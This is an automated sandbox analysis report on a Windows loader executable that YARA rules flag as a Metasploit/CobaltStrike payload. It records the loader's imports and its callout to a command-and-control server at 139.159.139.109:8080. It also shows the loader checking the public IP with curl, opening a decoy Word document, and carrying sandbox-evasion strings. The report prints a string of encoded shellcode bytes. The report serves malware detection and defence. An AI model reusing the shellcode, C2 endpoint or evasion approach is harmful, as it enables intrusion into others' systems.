                                    SHA1:ae43a10d462f09aa7b945b5b37aad9c0d1df4b01
                                    SHA256:517b6b3e890f7b93e0006cd8486b778075ebcc647565d37f2186500a8ddc1ff7
                                    SHA512:aa82c0becd41cb8bd5ef45a352fcf4e7432495041d0b36687f02bb95705e61fa017b018a016c615271c7d670cef113bbe87285baebf2d0de2e845c18f1270939
                                    SSDEEP:6144:/6WW4uEbwm8kZ/w2FmOblG/h88OfGJUiuWtgPleGJEdpVNeOo:/6VYdNpmKlG5XqJGgPkG
                                    TLSH:F9B4E9316A1524B9E2EAC0744249856365397C8DD729B9FB01E4B2342FB7FF71B3A60C
                                    File Content Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.........n(^..{^..{^..{W..{R..{O&.z\..{O&.z]..{O&.zW..{O&.zI..{...zV..{...zE..{^..{'..{^..{...{.&.{_..{.&.z_..{Rich^..{...............
                                    Icon Hash:0b03084c4e4e0383
                                    Entrypoint:0x14004a5b0
                                    Entrypoint Section:.text
                                    Digitally signed:false
                                    Imagebase:0x140000000
                                    Subsystem:windows gui
                                    Image File Characteristics:EXECUTABLE_IMAGE, LARGE_ADDRESS_AWARE
                                    DLL Characteristics:HIGH_ENTROPY_VA, DYNAMIC_BASE, NX_COMPAT, TERMINAL_SERVER_AWARE
                                    Time Stamp:0x67610374 [Tue Dec 17 04:52:04 2024 UTC]
                                    TLS Callbacks:0x4000d750, 0x1, 0x4003a6f0, 0x1
                                    CLR (.Net) Version:
                                    OS Version Major:6
                                    OS Version Minor:0
                                    File Version Major:6
                                    File Version Minor:0
                                    Subsystem Version Major:6
                                    Subsystem Version Minor:0
                                    Import Hash:e181d703c1ccac643c75df695343568f
                                    Instruction
                                    dec eax
                                    sub esp, 28h
                                    call 00007FA4BD1A5208h
                                    dec eax
                                    add esp, 28h
                                    jmp 00007FA4BD1A4D97h
                                    int3
                                    int3
                                    int3
                                    int3
                                    int3
                                    int3
                                    int3
                                    int3
                                    int3
                                    int3
                                    int3
                                    int3
                                    int3
                                    int3
                                    int3
                                    int3
                                    int3
                                    int3
                                    int3
                                    int3
                                    nop word ptr [eax+eax+00000000h]
                                    dec eax
                                    sub esp, 10h
                                    dec esp
                                    mov dword ptr [esp], edx
                                    dec esp
                                    mov dword ptr [esp+08h], ebx
                                    dec ebp
                                    xor ebx, ebx
                                    dec esp
                                    lea edx, dword ptr [esp+18h]
                                    dec esp
                                    sub edx, eax
                                    dec ebp
                                    cmovb edx, ebx
                                    dec esp
                                    mov ebx, dword ptr [00000010h]
                                    dec ebp
                                    cmp edx, ebx
                                    jnc 00007FA4BD1A4F38h
                                    inc cx
                                    and edx, 8D4DF000h
                                    wait
                                    add al, dh
                                    Programming Language:
                                    • [IMP] VS2008 SP1 build 30729
                                    Name | Virtual Address | Virtual Size | Is in Section
                                    IMAGE_DIRECTORY_ENTRY_EXPORT | 0x0 | 0x0 |
                                    IMAGE_DIRECTORY_ENTRY_IMPORT | 0x66f34 | 0x104 | .rdata
                                    IMAGE_DIRECTORY_ENTRY_RESOURCE | 0x6c000 | 0x10b40 | .rsrc
                                    IMAGE_DIRECTORY_ENTRY_EXCEPTION | 0x69000 | 0x2ec8 | .pdata
                                    IMAGE_DIRECTORY_ENTRY_SECURITY | 0x0 | 0x0 |
                                    IMAGE_DIRECTORY_ENTRY_BASERELOC | 0x7d000 | 0x90c | .reloc
                                    IMAGE_DIRECTORY_ENTRY_DEBUG | 0x5f550 | 0x54 | .rdata
                                    IMAGE_DIRECTORY_ENTRY_COPYRIGHT | 0x0 | 0x0 |
                                    IMAGE_DIRECTORY_ENTRY_GLOBALPTR | 0x0 | 0x0 |
                                    IMAGE_DIRECTORY_ENTRY_TLS | 0x5f600 | 0x28 | .rdata
                                    IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG | 0x5f410 | 0x140 | .rdata
                                    IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT | 0x0 | 0x0 |
                                    IMAGE_DIRECTORY_ENTRY_IAT | 0x4e000 | 0x450 | .rdata
                                    IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT | 0x0 | 0x0 |
                                    IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR | 0x0 | 0x0 |
                                    IMAGE_DIRECTORY_ENTRY_RESERVED | 0x0 | 0x0 |
                                    Name | Virtual Address | Virtual Size | Raw Size | MD5 | Xored PE | ZLIB Complexity | File Type | Entropy | Characteristics
                                    .text | 0x1000 | 0x4cb81 | 0x4cc00 | 59e645b10daf9e13e7e0365f93b46854 | False | 0.519213151465798 | data | 6.410429474183223 | IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
                                    .rdata | 0x4e000 | 0x19f80 | 0x1a000 | d200ec812104f6b1e56c44927cc03075 | False | 0.39791165865384615 | data | 5.929914038965162 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
                                    .data | 0x68000 | 0x4c0 | 0x200 | b0a52caa26824fe2292684499e256f5c | False | 0.287109375 | data | 2.3402856607159674 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                                    .pdata | 0x69000 | 0x2ec8 | 0x3000 | 2f14aae3a7cccffffd7fde4a327f957b | False | 0.50146484375 | data | 5.598549220182398 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
                                    .rsrc | 0x6c000 | 0x10b40 | 0x10c00 | c9ba3dce4a01b0233a1ee90428fde01f | False | 0.06862173507462686 | data | 4.631565874341215 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
                                    .reloc | 0x7d000 | 0x90c | 0xa00 | 05d74b2675f47a61dea3c5e26b019d48 | False | 0.5828125 | data | 5.226710425977709 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_READ
                                    Name | RVA | Size | Type | Language | Country | ZLIB Complexity
                                    RT_ICON | 0x6c0e8 | 0x10828 | Device independent bitmap graphic, 128 x 256 x 32, image size 65536, resolution 15118 x 15118 px/m | English | United States | 0.06374955637051934
                                    RT_GROUP_ICON | 0x7c910 | 0x14 | data | English | United States | 1.15
                                    RT_VERSION | 0x7c924 | 0x21c | data | English | United States | 0.5148148148148148
                                    DLL | Import
                                    bcrypt.dll | BCryptGenRandom
                                    KERNEL32.dll | SetLastError, lstrlenW, GetModuleHandleW, FormatMessageW, HeapAlloc, GetProcessHeap, GetCurrentDirectoryW, RtlCaptureContext, RtlLookupFunctionEntry, WaitForSingleObjectEx, LoadLibraryA, GetCurrentProcess, GetCurrentProcessId, CreateMutexA, ReleaseMutex, RtlVirtualUnwind, WideCharToMultiByte, GetEnvironmentVariableW, CreateFileW, SetFileInformationByHandle, IsDebuggerPresent, VirtualProtect, VirtualAlloc, ConvertThreadToFiber, CreateFiber, SwitchToFiber, ReleaseSRWLockExclusive, FreeEnvironmentStringsW, DeleteProcThreadAttributeList, CompareStringOrdinal, QueryPerformanceCounter, AcquireSRWLockExclusive, GetEnvironmentStringsW, DuplicateHandle, WriteFileEx, SleepEx, GetExitCodeProcess, TryAcquireSRWLockExclusive, QueryPerformanceFrequency, AcquireSRWLockShared, ReleaseSRWLockShared, CreateEventW, ReadFile, GetOverlappedResult, CancelIo, GetLastError, GetProcAddress, ExitProcess, GetFullPathNameW, CreateNamedPipeW, ReadFileEx, WaitForMultipleObjects, GetSystemDirectoryW, GetWindowsDirectoryW, CreateProcessW, GetFileAttributesW, InitializeProcThreadAttributeList, UpdateProcThreadAttribute, CreateThread, GetSystemTimeAsFileTime, HeapReAlloc, GetModuleHandleA, WriteConsoleW, MultiByteToWideChar, GetConsoleMode, GetModuleFileNameW, HeapFree, GetCurrentThread, SetThreadStackGuarantee, AddVectoredExceptionHandler, Sleep, CloseHandle, WaitForSingleObject, SetWaitableTimer, SetUnhandledExceptionFilter, CreateWaitableTimerExW, UnhandledExceptionFilter, InitializeSListHead, GetCurrentThreadId, GetStdHandle, IsProcessorFeaturePresent
                                    ADVAPI32.dll | RegQueryValueExW, SystemFunction036, RegCloseKey, RegOpenKeyExW
                                    api-ms-win-core-synch-l1-2-0.dll | WakeByAddressAll, WakeByAddressSingle, WaitOnAddress
                                    ntdll.dll | RtlNtStatusToDosError, NtReadFile, NtWriteFile
                                    VCRUNTIME140.dll | __current_exception, __C_specific_handler, __current_exception_context, memmove, __CxxFrameHandler3, memset, memcmp, memcpy, _CxxThrowException
                                    api-ms-win-crt-string-l1-1-0.dll | strlen
                                    api-ms-win-crt-heap-l1-1-0.dll | free, _set_new_mode
                                    api-ms-win-crt-math-l1-1-0.dll | __setusermatherr
                                    api-ms-win-crt-runtime-l1-1-0.dll | __p___argv, __p___argc, _cexit, exit, _initterm_e, _initterm, _get_initial_narrow_environment, _initialize_narrow_environment, _configure_narrow_argv, _c_exit, _set_app_type, _seh_filter_exe, _register_thread_local_exe_atexit_callback, terminate, _crt_atexit, _initialize_onexit_table, _register_onexit_function, _exit
                                    api-ms-win-crt-stdio-l1-1-0.dll | __p__commode, _set_fmode
                                    api-ms-win-crt-locale-l1-1-0.dll | _configthreadlocale
                                    Language of compilation system | Country where language is spoken | Map
                                    English | United States |
                                    Timestamp | Source Port | Dest Port | Source IP | Dest IP
                                    Dec 18, 2024 16:23:14.099164009 CET | 49706 | 80 | 192.168.2.5 | 104.26.12.31
                                    Dec 18, 2024 16:23:14.218908072 CET | 80 | 49706 | 104.26.12.31 | 192.168.2.5
                                    Dec 18, 2024 16:23:14.222798109 CET | 49706 | 80 | 192.168.2.5 | 104.26.12.31
                                    Dec 18, 2024 16:23:14.223151922 CET | 49706 | 80 | 192.168.2.5 | 104.26.12.31
                                    Dec 18, 2024 16:23:14.342947960 CET | 80 | 49706 | 104.26.12.31 | 192.168.2.5
                                    Dec 18, 2024 16:23:15.490381956 CET | 80 | 49706 | 104.26.12.31 | 192.168.2.5
                                    Dec 18, 2024 16:23:15.496172905 CET | 49706 | 80 | 192.168.2.5 | 104.26.12.31
                                    Dec 18, 2024 16:23:15.623450994 CET | 80 | 49706 | 104.26.12.31 | 192.168.2.5
                                    Dec 18, 2024 16:23:15.623600006 CET | 49706 | 80 | 192.168.2.5 | 104.26.12.31
                                    Dec 18, 2024 16:23:16.119896889 CET | 49707 | 8080 | 192.168.2.5 | 139.159.139.109
                                    Dec 18, 2024 16:23:16.239733934 CET | 8080 | 49707 | 139.159.139.109 | 192.168.2.5
                                    Dec 18, 2024 16:23:16.239875078 CET | 49707 | 8080 | 192.168.2.5 | 139.159.139.109
                                    Dec 18, 2024 16:23:16.246674061 CET | 49707 | 8080 | 192.168.2.5 | 139.159.139.109
                                    Dec 18, 2024 16:23:16.366442919 CET | 8080 | 49707 | 139.159.139.109 | 192.168.2.5
                                    Dec 18, 2024 16:23:18.873686075 CET | 8080 | 49707 | 139.159.139.109 | 192.168.2.5
                                    Dec 18, 2024 16:23:18.873788118 CET | 49707 | 8080 | 192.168.2.5 | 139.159.139.109
                                    Dec 18, 2024 16:23:18.873902082 CET | 49707 | 8080 | 192.168.2.5 | 139.159.139.109
                                    Dec 18, 2024 16:23:18.994864941 CET | 8080 | 49707 | 139.159.139.109 | 192.168.2.5
                                    Timestamp | Source Port | Dest Port | Source IP | Dest IP
                                    Dec 18, 2024 16:23:13.853003979 CET | 49675 | 53 | 192.168.2.5 | 1.1.1.1
                                    Dec 18, 2024 16:23:14.093669891 CET | 53 | 49675 | 1.1.1.1 | 192.168.2.5
                                    Timestamp | Source IP | Dest IP | Trans ID | OP Code | Name | Type | Class | DNS over HTTPS
                                    Dec 18, 2024 16:23:13.853003979 CET | 192.168.2.5 | 1.1.1.1 | 0x82bc | Standard query (0) | ip.sb | A (IP address) | IN (0x0001) | false
                                    Timestamp | Source IP | Dest IP | Trans ID | Reply Code | Name | CName | Address | Type | Class | DNS over HTTPS
                                    Dec 18, 2024 16:23:14.093669891 CET | 1.1.1.1 | 192.168.2.5 | 0x82bc | No error (0) | ip.sb |  | 104.26.12.31 | A (IP address) | IN (0x0001) | false
                                    Dec 18, 2024 16:23:14.093669891 CET | 1.1.1.1 | 192.168.2.5 | 0x82bc | No error (0) | ip.sb |  | 104.26.13.31 | A (IP address) | IN (0x0001) | false
                                    Dec 18, 2024 16:23:14.093669891 CET | 1.1.1.1 | 192.168.2.5 | 0x82bc | No error (0) | ip.sb |  | 172.67.75.172 | A (IP address) | IN (0x0001) | false
                                    Dec 18, 2024 16:23:41.674988985 CET | 1.1.1.1 | 192.168.2.5 | 0x8ef1 | No error (0) | templatesmetadata.office.net | templatesmetadata.office.net.edgekey.net |  | CNAME (Canonical name) | IN (0x0001) | false
                                    • ip.sb
                                    • 139.159.139.109:8080
                                    Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                    0 | 192.168.2.5 | 49706 | 104.26.12.31 | 80 | 4068 | C:\Windows\System32\curl.exe
                                    Timestamp | Bytes transferred | Direction | Data
                                    Dec 18, 2024 16:23:14.223151922 CET | 69 | OUT | GET / HTTP/1.1
                                    Host: ip.sb
                                    User-Agent: curl/7.83.1
                                    Accept: */*
                                    Dec 18, 2024 16:23:15.490381956 CET | 781 | IN | HTTP/1.1 200 OK
                                    Date: Wed, 18 Dec 2024 15:23:15 GMT
                                    Content-Type: text/plain
                                    Content-Length: 13
                                    Connection: keep-alive
                                    Cache-Control: no-cache
                                    cf-cache-status: DYNAMIC
                                    Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=5ozhMAtkqD15Y9fOQUlKGEUWCLf1fCdfplBjONcqXZXVb5jZzwpt2lFz00iMjht3c5tRzmh%2FpXG%2FiygSQi2swYoZUS6uCj0S%2B%2FU6biH89Z1F8DKwAjwp"}],"group":"cf-nel","max_age":604800}
                                    NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                    Server: cloudflare
                                    CF-RAY: 8f40272bb8e41865-EWR
                                    alt-svc: h3=":443"; ma=86400
                                    server-timing: cfL4;desc="?proto=TCP&rtt=3038&min_rtt=3038&rtt_var=1519&sent=1&recv=3&lost=0&retrans=0&sent_bytes=0&recv_bytes=69&delivery_rate=0&cwnd=193&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"
                                    Data Raw: 38 2e 34 36 2e 31 32 33 2e 31 38 39 0a
                                    Data Ascii: 8.46.123.189


                                    Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                    1 | 192.168.2.5 | 49707 | 139.159.139.109 | 8080 | 3056 | C:\Users\user\Desktop\VKJITO.exe
                                    Timestamp | Bytes transferred | Direction | Data
                                    Dec 18, 2024 16:23:16.246674061 CET | 163 | OUT | GET /uz68 HTTP/1.1
                                    User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1)
                                    Host: 139.159.139.109:8080
                                    Connection: Keep-Alive
                                    Cache-Control: no-cache


                                    Target ID:0
                                    Start time:10:23:12
                                    Start date:18/12/2024
                                    Path:C:\Users\user\Desktop\VKJITO.exe
                                    Wow64 process (32bit):false
                                    Commandline:"C:\Users\user\Desktop\VKJITO.exe"
                                    Imagebase:0x7ff7d4310000
                                    File size:505'856 bytes
                                    MD5 hash:34BFA047AACA8FD4DC99759EBF0E1A6A
                                    Has elevated privileges:true
                                    Has administrator privileges:true
                                    Programmed in:C, C++ or other language
                                    Yara matches:
                                    • Rule: JoeSecurity_MetasploitPayload_3, Description: Yara detected Metasploit Payload, Source: 00000000.00000002.2451518611.000001A673A10000.00000010.00001000.00020000.00000000.sdmp, Author: Joe Security
                                    • Rule: JoeSecurity_CobaltStrike_3, Description: Yara detected CobaltStrike, Source: 00000000.00000002.2451518611.000001A673A10000.00000010.00001000.00020000.00000000.sdmp, Author: Joe Security
                                    • Rule: Windows_Trojan_Metasploit_7bc0f998, Description: Identifies the API address lookup function leverage by metasploit shellcode, Source: 00000000.00000002.2451518611.000001A673A10000.00000010.00001000.00020000.00000000.sdmp, Author: unknown
                                    • Rule: Windows_Trojan_Metasploit_c9773203, Description: Identifies the 64 bit API hashing function used by Metasploit. This has been re-used by many other malware families., Source: 00000000.00000002.2451518611.000001A673A10000.00000010.00001000.00020000.00000000.sdmp, Author: unknown
                                    • Rule: JoeSecurity_MetasploitPayload_3, Description: Yara detected Metasploit Payload, Source: 00000000.00000002.2451554357.000001A673ABC000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                    • Rule: JoeSecurity_CobaltStrike_3, Description: Yara detected CobaltStrike, Source: 00000000.00000002.2451554357.000001A673ABC000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                    • Rule: Windows_Trojan_Metasploit_7bc0f998, Description: Identifies the API address lookup function leverage by metasploit shellcode, Source: 00000000.00000002.2451554357.000001A673ABC000.00000004.00000020.00020000.00000000.sdmp, Author: unknown
                                    • Rule: Windows_Trojan_Metasploit_c9773203, Description: Identifies the 64 bit API hashing function used by Metasploit. This has been re-used by many other malware families., Source: 00000000.00000002.2451554357.000001A673ABC000.00000004.00000020.00020000.00000000.sdmp, Author: unknown
                                    Reputation:low
                                    Has exited:true

                                    Target ID:1
                                    Start time:10:23:12
                                    Start date:18/12/2024
                                    Path:C:\Windows\System32\curl.exe
                                    Wow64 process (32bit):false
                                    Commandline:"curl" ip.sb
                                    Imagebase:0x7ff7f0bf0000
                                    File size:530'944 bytes
                                    MD5 hash:EAC53DDAFB5CC9E780A7CC086CE7B2B1
                                    Has elevated privileges:true
                                    Has administrator privileges:true
                                    Programmed in:C, C++ or other language
                                    Reputation:moderate
                                    Has exited:true

                                    Target ID:2
                                    Start time:10:23:12
                                    Start date:18/12/2024
                                    Path:C:\Windows\System32\conhost.exe
                                    Wow64 process (32bit):false
                                    Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                    Imagebase:0x7ff6d64d0000
                                    File size:862'208 bytes
                                    MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                    Has elevated privileges:true
                                    Has administrator privileges:true
                                    Programmed in:C, C++ or other language
                                    Reputation:high
                                    Has exited:true

                                    Target ID:4
                                    Start time:10:23:14
                                    Start date:18/12/2024
                                    Path:C:\Windows\System32\cmd.exe
                                    Wow64 process (32bit):false
                                    Commandline:"cmd" /c start C:\Users\user\Desktop\???????.docx
                                    Imagebase:0x7ff7c8390000
                                    File size:289'792 bytes
                                    MD5 hash:8A2122E8162DBEF04694B9C3E0B6CDEE
                                    Has elevated privileges:true
                                    Has administrator privileges:true
                                    Programmed in:C, C++ or other language
                                    Reputation:high
                                    Has exited:true

                                    Target ID:5
                                    Start time:10:23:14
                                    Start date:18/12/2024
                                    Path:C:\Windows\System32\conhost.exe
                                    Wow64 process (32bit):false
                                    Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                    Imagebase:0x7ff6d64d0000
                                    File size:862'208 bytes
                                    MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                    Has elevated privileges:true
                                    Has administrator privileges:true
                                    Programmed in:C, C++ or other language
                                    Reputation:high
                                    Has exited:true

                                    Target ID:6
                                    Start time:10:23:14
                                    Start date:18/12/2024
                                    Path:C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE
                                    Wow64 process (32bit):true
                                    Commandline:"C:\Program Files (x86)\Microsoft Office\Root\Office16\WINWORD.EXE" /n "C:\Users\user\Desktop\???????.docx" /o ""
                                    Imagebase:0x860000
                                    File size:1'620'872 bytes
                                    MD5 hash:1A0C2C2E7D9C4BC18E91604E9B0C7678
                                    Has elevated privileges:true
                                    Has administrator privileges:true
                                    Programmed in:C, C++ or other language
                                    Reputation:high
                                    Has exited:false

                                    Target ID:9
                                    Start time:10:23:18
                                    Start date:18/12/2024
                                    Path:C:\Windows\System32\WerFault.exe
                                    Wow64 process (32bit):false
                                    Commandline:C:\Windows\system32\WerFault.exe -u -p 3056 -s 1076
                                    Imagebase:0x7ff6d9f90000
                                    File size:570'736 bytes
                                    MD5 hash:FD27D9F6D02763BDE32511B5DF7FF7A0
                                    Has elevated privileges:true
                                    Has administrator privileges:true
                                    Programmed in:C, C++ or other language
                                    Reputation:high
                                    Has exited:true


                                      Execution Graph

                                      Execution Coverage:2.6%
                                      Dynamic/Decrypted Code Coverage:0%
                                      Signature Coverage:31.9%
                                      Total number of Nodes:618
                                      Total number of Limit Nodes:36
                                      APIs
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.2451896397.00007FF7D4311000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF7D4310000, based on PE: true
                                      • Associated: 00000000.00000002.2451876495.00007FF7D4310000.00000002.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.2451939524.00007FF7D435E000.00000002.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.2451986662.00007FF7D4378000.00000004.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.2452009616.00007FF7D4379000.00000002.00000001.01000000.00000003.sdmp
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_7ff7d4310000_VKJITO.jbxd
                                      Similarity
                                      • API ID: CloseHandle$EnvironmentExclusiveLockStrings$AcquireFreeReleasememmove
                                      • String ID: .exeprogram not found$PATHlibrary\std\src\sys_common\process.rs$\?\\$]?\\$assertion failed: self.height > 0$exe\\.\NUL\cmd.exemaximum number of ProcThreadAttributes exceeded
                                      • API String ID: 91921124-3342424890
                                      • Opcode ID: e1e732009ec57b56432fb0a3b5a4d220c72b66c861c76189749aef20f7872ff1
                                      • Instruction ID: 314a3a295eaa3fe2852caf01ba118a4e3be02d6c4a67ce2811ce09486fd7f747
                                      • Opcode Fuzzy Hash: e1e732009ec57b56432fb0a3b5a4d220c72b66c861c76189749aef20f7872ff1
                                      • Instruction Fuzzy Hash: 34339462A04BC188EB70AF2ADC843FD6761FB45789FC4513ADA4D6BB99DF399240C710

                                      Control-flow Graph

7ff7d43430b9-7ff7d43430ca call 7ff7d43272b0 1200->1210 1201->1193 1209 7ff7d4343098 1201->1209 1202->1160 1203->1184 1206->1207 1209->1192 1210->1207 1218 7ff7d4342d6b-7ff7d4342d72 1214->1218 1219 7ff7d43430cf-7ff7d43430d2 1214->1219 1215->1171 1216->1114 1218->1215 1219->1174 1222 7ff7d43430db-7ff7d43430e4 call 7ff7d435c170 1219->1222 1222->1144
                                      APIs
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.2451896397.00007FF7D4311000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF7D4310000, based on PE: true
                                      • Associated: 00000000.00000002.2451876495.00007FF7D4310000.00000002.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.2451939524.00007FF7D435E000.00000002.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.2451986662.00007FF7D4378000.00000004.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.2452009616.00007FF7D4379000.00000002.00000001.01000000.00000003.sdmp
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_7ff7d4310000_VKJITO.jbxd
                                      Similarity
                                      • API ID: CryptCurrentProcessRandom
                                      • String ID:
                                      • API String ID: 2610850170-0
                                      • Opcode ID: f7dec293c5321023aafea9e39b34245bcf127b9f491b0d5b55acd89856d62f80
                                      • Instruction ID: a459fed09a78db4be9c334a00e390a41718f0a989e4c9041a0bff9918e5bba00
                                      • Opcode Fuzzy Hash: f7dec293c5321023aafea9e39b34245bcf127b9f491b0d5b55acd89856d62f80
                                      • Instruction Fuzzy Hash: C522D322A04A9189E7609F3ADC803ED7BA0FB0479CFC4423ADA5D67BD8DF78D5458320

                                      Control-flow Graph

                                      APIs
                                      Similarity
                                      • API ID: ErrorFileObjectSingleStatusWaitWrite
                                      • String ID:
                                      • API String ID: 3447438843-0
                                      • Opcode ID: 0c453017f7dbb31ba1ef3a11cfbce3ae70ece853cc87e92697933e530efc709c
                                      • Instruction ID: 1ef79aaf164ed2ca02d9061d0a95c2b681d789ae072c581bd7833e0629829295
                                      • Opcode Fuzzy Hash: 0c453017f7dbb31ba1ef3a11cfbce3ae70ece853cc87e92697933e530efc709c
                                      • Instruction Fuzzy Hash: 08315032618B8186EB20DF29F4803AEB3A5FB84390F908135E6DD57BA4DF3CD0848B10

                                      Control-flow Graph

                                      APIs
                                      Strings
                                      • called `Result::unwrap()` on an `Err` value, xrefs: 00007FF7D4311737
                                      • stdoutstd\src\io\mod.rsfailed to write whole buffer, xrefs: 00007FF7D431142F
                                      • crypt6252.72.131.228240.232.200.00.0.65.8165.80.82.8186.72.49.210101.72.139.8296.72.139.8224.72.139.8232.72.139.11480.72.15.18374.74.77.49201.72.49.192172.60.97.1242.44.32.65193.201.13.651.193.226.23782.65.81.72139.82.32.13966.60.72.1208.102, xrefs: 00007FF7D431161F
                                      Similarity
                                      • API ID: CloseHandleSingleTimerWaitable$AddressCreateObjectSleepWaitWakememmove
                                      • String ID: called `Result::unwrap()` on an `Err` value$crypt6252.72.131.228240.232.200.00.0.65.8165.80.82.8186.72.49.210101.72.139.8296.72.139.8224.72.139.8232.72.139.11480.72.15.18374.74.77.49201.72.49.192172.60.97.1242.44.32.65193.201.13.651.193.226.23782.65.81.72139.82.32.13966.60.72.1208.102$stdoutstd\src\io\mod.rsfailed to write whole buffer
                                      • API String ID: 2369806718-460783922
                                      • Opcode ID: 5e50ec85a417946ee25cb143daf145ec4ac7be7fc589595a81bf30fe61645157
                                      • Instruction ID: dce89f007956670fb53854de8954fcf4849ece249fd3da9d5da064adb793ead6
                                      • Opcode Fuzzy Hash: 5e50ec85a417946ee25cb143daf145ec4ac7be7fc589595a81bf30fe61645157
                                      • Instruction Fuzzy Hash: D9026232A08B4695EB11AF1AE8813ECA374FB08798FD4413ADA9D67794DF3CD185C360

                                      Control-flow Graph

                                      APIs
                                      Strings
                                      Similarity
                                      • API ID: CloseHandle$CodeErrorExitLastObjectProcessSingleWait
                                      • String ID: called `Result::unwrap()` on an `Err` value
                                      • API String ID: 17306042-2333694755
                                      • Opcode ID: f32aab344f718321276cfce7ff43fb377cd1a335c0314652abe8bc426d38f825
                                      • Instruction ID: 821e4447fdcf6e252e07753330c87685f9db52713b91d998c7f221516c0ae4da
                                      • Opcode Fuzzy Hash: f32aab344f718321276cfce7ff43fb377cd1a335c0314652abe8bc426d38f825
                                      • Instruction Fuzzy Hash: 19916C32A04B8699E721EF2AE8847ED7760FB44798F844136EE5C53B58DF38D185C750

                                      Control-flow Graph

                                      APIs
                                      • strlen.API-MS-WIN-CRT-STRING-L1-1-0(?,?,?,?,?,?,?,?,00000001,00000000,?,?,00000000,?,00007FF7D431130C), ref: 00007FF7D43250A7
                                      Strings
                                      Similarity
                                      • API ID: strlen
                                      • String ID: Failed to open file$called `Result::unwrap()` on an `Err` valuebypass\tools\src\lib.rscmd/ccalled `Option::unwrap()` on a `None` value$sandbox1$sandbox2$sandbox3$start
                                      • API String ID: 39653677-2961894791
                                      • Opcode ID: e1bb3d0855e3b08e5f0c4d74801302d93b06ec36227df3020df2ba6d60c9db2f
                                      • Instruction ID: 8fdce523410706ecc326b6dc90db3a84ce12363aec4661fcf44656867557433c
                                      • Opcode Fuzzy Hash: e1bb3d0855e3b08e5f0c4d74801302d93b06ec36227df3020df2ba6d60c9db2f
                                      • Instruction Fuzzy Hash: 9CE17562A05AC294FB61AF6AD8813ED7761FB44798FC4813BDE4C27695DF38D285C320

                                      Control-flow Graph

                                      APIs
                                      Similarity
                                      • API ID: __p___argc__p___argv__scrt_acquire_startup_lock__scrt_release_startup_lock_cexit_exit_get_initial_narrow_environment_register_thread_local_exe_atexit_callback
                                      • String ID:
                                      • API String ID: 1133592946-0
                                      • Opcode ID: c8766be1c68f80b00f9d8361ec58a8958c2ed24d493446e2ac115a53faac1bdf
                                      • Instruction ID: aabae253c4eec2be151aa1cd74d89e2916727061e67d4bdeeb042928590acbe9
                                      • Opcode Fuzzy Hash: c8766be1c68f80b00f9d8361ec58a8958c2ed24d493446e2ac115a53faac1bdf
                                      • Instruction Fuzzy Hash: 78314A61A0C18243FA14BF6FD4D53BDAB91AF45784FD4443EEA8E276D3CE2CA444A670

                                      Control-flow Graph

                                      APIs
                                      Similarity
                                      • API ID: CloseCreateErrorEventHandleLast
                                      • String ID:
                                      • API String ID: 937152468-0
                                      • Opcode ID: 9afe5e846bde485cb8bb49b880daa7dd6efead5c1ac7238222e04662c7bb6096
                                      • Instruction ID: f0e8f406e6b9901d04d5851da61d58f01f80fd4144c87265a1b7dc7a9304d1f1
                                      • Opcode Fuzzy Hash: 9afe5e846bde485cb8bb49b880daa7dd6efead5c1ac7238222e04662c7bb6096
                                      • Instruction Fuzzy Hash: 09818422F08A5589FB14AF6ADC803FC6760FB04798F90053ADE1D67B99DF38D5958360

                                      Control-flow Graph

                                      APIs
                                      Similarity
                                      • API ID: Fiber$SwitchVirtual$AllocConvertCreateProtectThreadmemmove
                                      • String ID:
                                      • API String ID: 2990300613-0
                                      • Opcode ID: 631ac8cff794fe8eb457b7d7e8aceb2a3c69c13bb6798a98e485168742f228b2
                                      • Instruction ID: f034612f4521d410f505609a434712fd40ba7cd669800585dbd09c688f135372
                                      • Opcode Fuzzy Hash: 631ac8cff794fe8eb457b7d7e8aceb2a3c69c13bb6798a98e485168742f228b2
                                      • Instruction Fuzzy Hash: D7F0AF6170915142EA18BF6BAE59B6ECA916F4DFD1FC0803ADD0E67F94CD3CC1464710

                                      Control-flow Graph

                                      APIs
                                      Similarity
                                      • API ID: ErrorLast$FileHandle$CloseCreateInformation
                                      • String ID:
                                      • API String ID: 1617036312-0
